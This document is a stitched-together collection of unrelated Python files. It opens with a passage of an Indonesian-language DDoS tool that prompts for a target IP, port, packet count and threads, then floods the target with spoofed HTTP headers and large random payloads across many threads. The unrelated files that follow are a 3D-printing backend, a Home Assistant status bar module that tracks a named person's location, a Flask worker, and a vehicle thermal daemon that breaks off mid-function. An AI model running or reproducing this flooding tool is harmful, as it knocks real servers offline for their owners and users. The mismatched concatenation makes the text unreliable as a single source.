'http://www.fillmorefairways.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://growtopiagame.com/', 'http://check-host.net/check-http?url=',
'http://ip2location.com/', 'https://pointblank.com/',
'https://www.ted.com/search?q=',
'https://drive.google.com/viewerng/viewer?url=',
'http://validator.w3.org/feed/check.cgi?url=',
'http://host-tracker.com/check_page/?furl=',
'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=',
'https://soda.demo.socrata.com/resource/4tka-6guv.json?$q=',
'https://play.google.com/store/search?q=',
'http://jigsaw.w3.org/css-validator/validator?uri=',
'https://add.my.yahoo.com/rss?url=', 'http://www.google.com/?q=',
'https://www.cia.gov/index.html', 'https://www.google.ad/search?q=',
'https://www.google.ae/search?q=', 'https://vk.com/profile.php?redirect=',
'https://www.google.ae/search?q=', 'https://www.google.com.af/search?q=',
'https://www.google.com.ag/search?q=',
'https://www.google.com.ai/search?q=', 'https://www.google.al/search?q=',
'http://www.usatoday.com/search/results?q=',
'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=',
'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
]
acceptall = ["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
referers = [
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',]
print("""\033[1;33;40mTUNGGU UZI WATZEN ACCEPT PASSWORD""")
time.sleep(5)
os.system("clear")
print("\033[1;34;40m \n")
os.system("figlet DDOS ATTACK -f slant")
print("\033[1;33;40mJika Anda memiliki masalah, Hubugi Admin Github Nih https://github.com/UziWatzen/GTPS-ATTACK/\n")
print("\033[1;32;40m ==> [ DDOS UZI WATZEN ] <== \n")
test = input()
if test == "n":
exit(0)
print("\033[92m")
print("""
██╗░░░██╗███████╗██╗
██║░░░██║╚════██║██║
██║░░░██║░░███╔═╝██║
██║░░░██║██╔══╝░░██║
╚██████╔╝███████╗██║
░╚═════╝░╚══════╝╚═╝
░██████╗░██████╗░░█████╗░██████╗░███████╗██████╗░
██╔════╝░██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔══██╗
██║░░██╗░██████╔╝███████║██████╦╝█████╗░░██████╔╝
██║░░╚██╗██╔══██╗██╔══██║██╔══██╗██╔══╝░░██╔══██╗
╚██████╔╝██║░░██║██║░░██║██████╦╝███████╗██║░░██║
░╚═════╝░╚═╝░░╚═╝╚═╝░░╚═╝╚═════╝░╚══════╝╚═╝░░╚═╝
""")
print("\033[95m")
print("""
•JANGAN BANYAK BANYAK PAKETNYA ENTAR DOWN|•
|UZI WATZEN : DEVELOPER | ABUSE BLACKLIST |""")
print("\033[95m━━━[+] Masukan Nama Anda")
name = str(input("┗━━━━━━>\033[0m:"))
print("\033[44m━━━[+] Masukan Ip/Host")
ip = str(input("┗━━━━━━>\033[0m:"))
time.sleep(1)
print("\033[44m━━━[+] Masukan Port")
port = int(input("┗━━━━━━>\033[0m:"))
time.sleep(1)
print("\033[44m━━━[+] Masukan Jumlah Packet")
times = int(input("┗━━━━━━>\033[0m:"))
time.sleep(1)
print("\033[44m━━━[+] Masukan Jumlah Threads")
threads = int(input("┗━━━━━━>\033[0m:"))
def spoofer():
addr = [192, 168, 0, 1]
d = '.'
addr[0] = str(random.randrange(11, 197))
addr[1] = str(random.randrange(0, 255))
addr[2] = str(random.randrange(0, 255))
addr[3] = str(random.randrange(2, 254))
assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3]
return assemebled
def Ddos():
get_host = "GET HTTP/1.1\r\nHost: " + ip + "\r\n"
post_host = "POST HTTP/1.1\r\nHost: " + ip + "\r\n"
referer = "Referer: " + random.choice(referers) + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n" + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
length = "Content-Length: 0\r\n"
forward = "X-Forwarded-For: 1\r\n"
forwards = "Client-IP: " + ip + "\r\n"
accept = random.choice(acceptall) + "\r\n"
mozila = "User-Agent: " + random.choice(accept) + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
header = post_host + get_host + referer + mozila + forward + content + connection + length + "\r\n\r\n"
randomip = str(random.randint(1, 255)) + "." + str(random.randint(0, 255)) + "." + str(random.randint(0, 255)) + "." + str(
random.randint(0, 255)) + "\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
request = post_host + get_host + forward + connection + mozila + forwards + header + useragent + accept + length + randomip + referer + content + "\r\n"
data = random._urandom(494949)
def Ddos():
get_data = "GET https://check-host.net//1.1\r\nHost: " + ip + "\r\n"
referer = "Referer: " + random.choice(referers) + ip + "\r\n"
accept = random.choice(acceptall)
Mozila = "User-Agent: " + random.choice(accept) + "\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
connection = "Connection: Shutdown\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
length = "Content-Length: 0\r\n"
forward = "X-Forwarded-For: " + ip + "\r\n"
forwards = "Client-IP: " + ip + "\r\n"
header = get_data + referer + forward + useragent + accept + content + connection + length + Mozila + "\r\n\r\n"
randomip = str(random.randint(1,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255))
request = get_data + forward + connection + useragent + forwards + header + length + randomip + referer + content + accept + Mozila + "\r\n"
data = random._urandom(494949)
def Ddos():
get_host = "GET /growtopia/server_data.php HTTP/1.1\r\nHost: " + ip + "\r\n"
get_data = "GET https://check-host.net//1.1\r\nHost: " + ip + "\r\n"
referer = "Referer: " + random.choice(referers) + ip + "\r\n"
accept = random.choice(acceptall)
Mozila = "User-Agent: " + random.choice(accept) + "\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
connection = "Connection: Shutdown\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
length = "Content-Length: 0\r\n"
forward = "X-Forwarded-For: " + ip + "\r\n"
forwards = "Client-IP: " + ip + "\r\n"
header = get_host + referer + forward + useragent + accept + content + connection + length + Mozila + "\r\n\r\n"
randomip = str(random.randint(1,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255))
request = get_host + forward + get_data + connection + useragent + forwards + header + length + randomip + referer + content + accept + Mozila + "\r\n"
data = random._urandom(494949)
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
s.send(data)
s.send(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
for x in range(600000):
s.send(data)
s.send(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((ip,port))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
for x in range(600000):
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
print(i +"\033[1;32;40m[+]Send Packet To ==> ",ip," Port ==> ",port,"!!!")
except :
s.close()
print("\033[1;32;40m[+] Send Packet To ==> ",ip," Port ==> ",port,"!!!")
def Keluar():
clear()
os.system("figlet Anda Meninggalkan Tuan -f miring")
sys.exit(130)
def exit_gracefully(signum, frame):
# mengembalikan Ping Server Orang
signal.signal(signal.SIGINT, original_sigint)
try:
exitc = str(input(" Anda ingin keluar dari Prmakaian Tools?:"))
if exitc == 'y':
Keluar()
except KeyboardInterrupt:
print("Ok ok")
Keluar()
# kembalikan handler keluar yang Dimatikan
signal.signal(signal.SIGINT, exit_gracefully)
if __name__ == '__main__':
# Untuk Menyimpan Sinyal Server
original_sigint = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, exit_gracefully)
for y in range(threads):
th = threading.Thread(target = Ddos)
th.start()
for x in range(threads):
th = threading.Thread(target = Ddos)
th.start()
for y in range(threads):
th = threading.Thread(target = Ddos)
th.start()
|
Backend.py
|
# Copyright (c) 2018 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
from enum import IntEnum
import struct
import subprocess
import sys
import threading
from time import sleep
from typing import Any, Dict, Optional
from UM.Backend.SignalSocket import SignalSocket
from UM.Logger import Logger
from UM.Signal import Signal, signalemitter
import UM.Application
from UM.PluginObject import PluginObject
from UM.Platform import Platform
import Arcus
## The current processing state of the backend.
class BackendState(IntEnum):
NotStarted = 1
Processing = 2
Done = 3
Error = 4
Disabled = 5
## Base class for any backend communication (separate piece of software).
# It makes use of the Socket class from libArcus for the actual communication bits.
# The message_handlers dict should be filled with string (full name of proto message), function pairs.
@signalemitter
class Backend(PluginObject):
def __init__(self):
super().__init__() # Call super to make multiple inheritance work.
self._supported_commands = {}
self._message_handlers = {}
self._socket = None
self._port = 49674
self._process = None # type: Optional[subprocess.Popen]
self._backend_log = []
self._backend_log_max_lines = None
self._backend_state = BackendState.NotStarted
UM.Application.Application.getInstance().callLater(self._createSocket)
processingProgress = Signal()
backendStateChange = Signal()
backendConnected = Signal()
backendQuit = Signal()
def setState(self, new_state):
if new_state != self._backend_state:
self._backend_state = new_state
self.backendStateChange.emit(self._backend_state)
## \brief Start the backend / engine.
# Runs the engine, this is only called when the socket is fully opened & ready to accept connections
def startEngine(self):
command = self.getEngineCommand()
if not command:
self._createSocket()
return
if not self._backend_log_max_lines:
self._backend_log = []
# Double check that the old process is indeed killed.
if self._process is not None:
self._process.terminate()
Logger.log("d", "Engine process is killed. Received return code %s", self._process.wait())
self._process = self._runEngineProcess(command)
if self._process is None: # Failed to start engine.
return
Logger.log("i", "Started engine process: %s", self.getEngineCommand()[0])
self._backendLog(bytes("Calling engine with: %s\n" % self.getEngineCommand(), "utf-8"))
t = threading.Thread(target = self._storeOutputToLogThread, args = (self._process.stdout,), name = "EngineOutputThread")
t.daemon = True
t.start()
t = threading.Thread(target = self._storeStderrToLogThread, args = (self._process.stderr,), name = "EngineErrorThread")
t.daemon = True
t.start()
def close(self):
if self._socket:
while self._socket.getState() == Arcus.SocketState.Opening:
sleep(0.1)
self._socket.close()
def _backendLog(self, line):
try:
line_str = line.decode("utf-8")
except UnicodeDecodeError:
line_str = line.decode("latin1") #Latin-1 as a fallback since it can never give decoding errors. All characters are 1 byte.
Logger.log("d", "[Backend] " + line_str.strip())
self._backend_log.append(line)
## Get the logging messages of the backend connection.
# \returns
def getLog(self):
if self._backend_log_max_lines and type(self._backend_log_max_lines) == int:
while len(self._backend_log) >= self._backend_log_max_lines:
del(self._backend_log[0])
return self._backend_log
## Get the command used to start the backend executable
def getEngineCommand(self):
return [UM.Application.Application.getInstance().getPreferences().getValue("backend/location"), "--port", str(self._socket.getPort())]
## Start the (external) backend process.
def _runEngineProcess(self, command_list) -> Optional[subprocess.Popen]:
kwargs = {} #type: Dict[str, Any]
if sys.platform == "win32":
su = subprocess.STARTUPINFO()
su.dwFlags |= subprocess.STARTF_USESHOWWINDOW
su.wShowWindow = subprocess.SW_HIDE
kwargs["startupinfo"] = su
kwargs["creationflags"] = 0x00004000 # BELOW_NORMAL_PRIORITY_CLASS
try:
return subprocess.Popen(command_list, stdin = subprocess.DEVNULL, stdout = subprocess.PIPE, stderr = subprocess.PIPE, **kwargs)
except PermissionError:
Logger.log("e", "Couldn't start back-end: No permission to execute process.")
except FileNotFoundError:
Logger.logException("e", "Unable to find backend executable: %s", command_list[0])
except BlockingIOError:
Logger.log("e", "Couldn't start back-end: Resource is temporarily unavailable")
return None
def _storeOutputToLogThread(self, handle):
while True:
try:
line = handle.readline()
except OSError:
Logger.logException("w", "Exception handling stdout log from backend.")
continue
if line == b"":
self.backendQuit.emit()
break
self._backendLog(line)
def _storeStderrToLogThread(self, handle):
while True:
try:
line = handle.readline()
except OSError:
Logger.logException("w", "Exception handling stderr log from backend.")
continue
if line == b"":
break
#self._backendLog(line)
## Private socket state changed handler.
def _onSocketStateChanged(self, state):
self._logSocketState(state)
if state == Arcus.SocketState.Listening:
if not UM.Application.Application.getInstance().getUseExternalBackend():
self.startEngine()
elif state == Arcus.SocketState.Connected:
Logger.log("d", "Backend connected on port %s", self._port)
self.backendConnected.emit()
## Debug function created to provide more info for CURA-2127
def _logSocketState(self, state):
if state == Arcus.SocketState.Listening:
Logger.log("d", "Socket state changed to Listening")
elif state == Arcus.SocketState.Connecting:
Logger.log("d", "Socket state changed to Connecting")
elif state == Arcus.SocketState.Connected:
Logger.log("d", "Socket state changed to Connected")
elif state == Arcus.SocketState.Error:
Logger.log("d", "Socket state changed to Error")
elif state == Arcus.SocketState.Closing:
Logger.log("d", "Socket state changed to Closing")
elif state == Arcus.SocketState.Closed:
Logger.log("d", "Socket state changed to Closed")
## Private message handler
def _onMessageReceived(self):
message = self._socket.takeNextMessage()
if message.getTypeName() not in self._message_handlers:
Logger.log("e", "No handler defined for message of type %s", message.getTypeName())
return
self._message_handlers[message.getTypeName()](message)
## Private socket error handler
def _onSocketError(self, error):
if error.getErrorCode() == Arcus.ErrorCode.BindFailedError:
self._port += 1
Logger.log("d", "Socket was unable to bind to port, increasing port number to %s", self._port)
elif error.getErrorCode() == Arcus.ErrorCode.ConnectionResetError:
Logger.log("i", "Backend crashed or closed.")
elif error.getErrorCode() == Arcus.ErrorCode.Debug:
Logger.log("d", "Socket debug: %s", str(error))
return
else:
Logger.log("w", "Unhandled socket error %s", str(error))
self._createSocket()
## Creates a socket and attaches listeners.
def _createSocket(self, protocol_file):
if self._socket:
Logger.log("d", "Previous socket existed. Closing that first.") # temp debug logging
self._socket.stateChanged.disconnect(self._onSocketStateChanged)
self._socket.messageReceived.disconnect(self._onMessageReceived)
self._socket.error.disconnect(self._onSocketError)
# Hack for (at least) Linux. If the socket is connecting, the close will deadlock.
while self._socket.getState() == Arcus.SocketState.Opening:
sleep(0.1)
# If the error occurred due to parsing, both connections believe that connection is okay.
# So we need to force a close.
self._socket.close()
self._socket = SignalSocket()
self._socket.stateChanged.connect(self._onSocketStateChanged)
self._socket.messageReceived.connect(self._onMessageReceived)
self._socket.error.connect(self._onSocketError)
if Platform.isWindows():
# On Windows, the Protobuf DiskSourceTree does stupid things with paths.
# So convert to forward slashes here so it finds the proto file properly.
# Using sys.getfilesystemencoding() avoid the application crashing if it is
# installed on a path with non-ascii characters GitHub issue #3907
protocol_file = protocol_file.replace("\\", "/").encode(sys.getfilesystemencoding())
if not self._socket.registerAllMessageTypes(protocol_file):
Logger.log("e", "Could not register Uranium protocol messages: %s", self._socket.getLastError())
if UM.Application.Application.getInstance().getUseExternalBackend():
Logger.log("i", "Listening for backend connections on %s", self._port)
self._socket.listen("127.0.0.1", self._port)
|
homeassistant.py
|
import http.client
import json
import time
from typing import Any, Dict, Optional, Tuple
from threading import Thread
from bitwarden import BitwardenPassword
from i3pystatus import IntervalModule
import color
def request(path: str,
token: str,
data: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
conn = http.client.HTTPSConnection("hass.thalheim.io")
headers = {
"Authorization": f"Bearer {token}",
"content-type": "application/json",
}
method = "GET"
body = None
if data:
body = json.dumps(data)
method = "POST"
conn.request(method, path, headers=headers, body=body)
resp = conn.getresponse().read()
return json.loads(resp.decode("utf-8"))
class State:
def __init__(self, password: BitwardenPassword):
self.entities: Optional[Dict[str, Any]] = None
self.password = password
thread = Thread(target=self.update_state)
thread.daemon = True
thread.start()
def update_state(self):
while True:
try:
self.update()
except Exception:
pass
time.sleep(30)
def update(self):
resp = request("/api/states", self.password.get())
entities = {}
for entity in resp:
entities[entity["entity_id"]] = entity
self.entities = entities
def get(self, entity_id: str) -> Optional[Dict[str, Any]]:
while self.entities is None:
time.sleep(1)
return self.entities.get(entity_id)
state = State(BitwardenPassword("home-assistant-token"))
# class WeatherIcon(IntervalModule):
# @require(internet)
# def run(self) -> None:
# global state
# weather = state.get("weather.openweathermap")
# if weather is None:
# return
# text = f"{weather['attributes']['temperature']}°C"
# #icon_name = weather['attributes']['icon']
# #icon = WEATHER_ICONS.get(icon_name, None)
# #if icon is None:
# # text = f'<span color="white">{icon_name}</span>'
# #else:
# # text = f'<span font_size="xx-large" color="white">{icon}</span>'
# self.output = dict(full_text=text,
# markup="pango"
# separator=False,
# separator_block_width=5)
class WeatherText(IntervalModule):
def run(self) -> None:
weather = state.get("weather.openweathermap")
if weather is None:
return
air_quality = state.get("sensor.bme680_air_quality")
temperature = state.get("sensor.bme680_temperature")
text = f"{weather['attributes']['temperature']}°C (inside: {temperature['state']}°C/air: {air_quality['state']}%)"
self.output = dict(full_text=text)
class Shannan(IntervalModule):
def run(self) -> None:
shannan = state.get("person.shannan_lekwati")
distance = state.get("sensor.shannan_joerg_distance")
locations = {
"not_home": "Away",
"Work of Shannan": "Work",
"Shannan's Home": "Home",
}
if shannan is None or distance is None:
return
location = locations.get(shannan['state'], shannan['state'])
self.output = dict(full_text=f"{location} ({distance['state']}km)")
status_symbols = {"off": "-", "on": "+", "FULL": "↯"}
def charge_state(level: int, state: str) -> Tuple[str, bool]:
if level == 100:
status = status_symbols["FULL"]
elif state in ["discharging", "NotCharging"]:
status = status_symbols["off"]
else:
status = status_symbols["on"]
return f"{status}{level}%", level < 40
def charge_state_android(state: State, device: str) -> Tuple[str, bool]:
battery_level = state.get(f"sensor.{device}_battery_level")
battery_state = state.get(f"sensor.{device}_battery_state")
if battery_level == "unknown" or battery_level is None or battery_state is None:
return "N/A", False
return charge_state(int(battery_level["state"]), battery_state["state"])
def charge_state_ios(state: State, device: str) -> Tuple[str, bool]:
battery = state.get(f"sensor.{device}_battery_state")
if battery is None or "battery" not in battery["attributes"]:
return "N/A", False
return charge_state(battery["attributes"]["battery"],
battery["attributes"]["battery_status"])
class PhoneBattery(IntervalModule):
hints = dict(markup=True)
def run(self) -> None:
redmi = charge_state_android(state, "redmi_note_5")
iphone = charge_state_ios(state, "beatrice_icloud")
watch = charge_state_ios(state, "shannans_apple_watch")
herbert = charge_state_ios(state, "herbert")
full_text = f"{redmi[0]} I:{iphone[0]} W:{watch[0]} H:{herbert[0]}"
critical = redmi[1] or iphone[1] or watch[1] or herbert[1]
text_color = color.text_down if critical else None
self.output = dict(full_text=full_text, color=text_color)
|
cfworker.py
|
#!/usr/bin/python
import flask
import multiprocessing, os
class cfworker(multiprocessing.Process, flask.Flask):
def __init__(self, port=None):
self.app = flask.Flask(__name__)
self.port = port
if not self.port:
self.port = int( os.getenv('PORT') )
def run(self):
self.app.run( host='0.0.0.0', port=self.port )
def start(self):
self.stop()
self.server = multiprocessing.Process(target=self.run)
try:
self.server.start()
except AssertionError as e:
pass
def stop(self):
try:
self.server.terminate()
self.server.join()
except AttributeError as e:
pass
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from system.hardware import HARDWARE, TICI, AGNOS
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from system.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import TiciFanController
from system.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 1.5 * DT_TRML) # 1.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if AGNOS and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version() # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv() # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if AGNOS and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
if TICI:
fan_controller = TiciFanController()
elif (sec_since_boot() - sm.rcv_time['pandaStates']) > DISCONNECT_TIMEOUT:
if onroad_conditions["ignition"]:
onroad_conditions["ignition"] = False
cloudlog.error("panda timed out onroad")
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
